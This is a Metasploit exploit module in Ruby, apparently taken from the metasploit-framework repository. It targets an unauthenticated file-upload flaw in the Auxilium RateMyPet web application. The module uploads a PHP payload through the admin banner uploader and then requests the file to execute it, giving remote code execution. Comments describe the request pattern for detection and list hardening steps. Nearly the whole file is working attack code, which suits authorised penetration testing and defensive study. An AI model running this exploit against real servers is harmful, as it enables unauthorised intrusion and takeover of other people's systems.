rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/auxilium_upload_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
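# Metasploit module for the Auxilium RateMyPet banner-upload flaw
# (OSVDB 85554, EDB 21329).
#
# Request pattern produced by the code below, for anyone writing detections
# or reviewing a deployment:
#   * POST <TARGETURI>/admin/sitebanners/upload_banners.php as
#     multipart/form-data, with a "userfile" part whose filename is five
#     random letters plus ".php". The module itself adds no credentials or
#     cookie to that request.
#   * GET <TARGETURI>/banners/<that filename> straight afterwards.
# Hardening that follows from this flow: require authentication on the admin
# path, limit banner uploads to image types, and do not let the web server
# execute scripts out of the banners directory.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
        'Description' => %q{
          This module exploits a vulnerability found in Auxilium RateMyPet's. The site
          banner uploading feature can be abused to upload an arbitrary file to the web
          server, which is accessible in the 'banner' directory, thus allowing remote code
          execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'DaOne', # Vulnerability discovery
          'sinn3r' # Metasploit
        ],
        'References' => [
          ['OSVDB', '85554'],
          ['EDB', '21329']
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'Platform' => %w{linux php},
        'Targets' => [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-09-14',
        'DefaultTarget' => 0,
        # NOTE(review): reliability, stability and side effects have not been
        # assessed for this module. upload_exec writes a .php file under
        # banners/ and sends two HTTP requests, so assume on-disk and web-log
        # artifacts on the target until these fields are filled in.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base directory to the application', '/Auxiliumpetratepro/'])
      ]
    )
  end

  # Fingerprints the banner-manager page; nothing is uploaded.
  #
  # The base path is derived the same way as in #exploit. Previously a
  # TARGETURI without a trailing slash resolved to the parent directory here,
  # so the probe hit the wrong URL and reported Safe for a host that #exploit
  # would still have reached.
  #
  # @return [Exploit::CheckCode] Unknown when the host does not answer,
  #   Detected when the page title matches, Safe otherwise
  def check
    res = send_request_raw({
      'uri' => normalize_uri("#{base_path}/admin/sitebanners/upload_banners.php")
    })

    # No response says nothing about the application; reporting Safe here
    # would be a false assurance.
    return Exploit::CheckCode::Unknown unless res

    if res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  # Submits the banner-upload form with the payload as "userfile", then
  # requests the uploaded file from the banners directory.
  #
  # @param base [String] application base path, without a trailing slash
  # @param php_fname [String] filename sent in the multipart part and
  #   requested afterwards
  # @param p [String] payload body placed in the "userfile" part
  # @return [void]
  def upload_exec(base, php_fname, p)
    data = Rex::MIME::Message.new
    data.add_part('http://', nil, nil, "form-data; name=\"burl\"")
    data.add_part('', nil, nil, "form-data; name=\"alt\"")
    data.add_part(p, 'text/plain', nil, "form-data; name=\"userfile\"; filename=\"#{php_fname}\"")
    data.add_part(' Upload', nil, nil, "form-data; name=\"submitok\"")

    post_data = data.to_s

    print_status("Uploading payload (#{p.length} bytes)...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })

    unless res
      print_error("No response from host")
      return
    end

    print_status("Requesting '#{php_fname}'...")
    res = send_request_raw({ 'uri' => normalize_uri("#{base}/banners/#{php_fname}") })

    # Only an explicit 404 counts as a failed upload; a missing response
    # falls through to the handler.
    if res && res.code == 404
      print_error("Upload unsuccessful: #{res.code}")
      return
    end

    handler
  end

  # Module entry point: picks a random five-letter .php name, builds the
  # payload and hands both to #upload_exec.
  #
  # @return [void]
  def exploit
    base = base_path
    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"

    # presumably :unlink_self makes the dropped file delete itself once it
    # has run; confirm in Msf::Exploit::PhpEXE
    p = get_write_exec_payload(:unlink_self => true)

    upload_exec(base, php_fname, p)
  end

  private

  # Application base directory from TARGETURI, without a trailing slash.
  # Shared by #check and #exploit so both address the same path.
  #
  # @return [String]
  def base_path
    uri = normalize_uri(target_uri.path)
    uri = "#{uri}/" unless uri.end_with?('/')
    File.dirname("#{uri}.")
  end
end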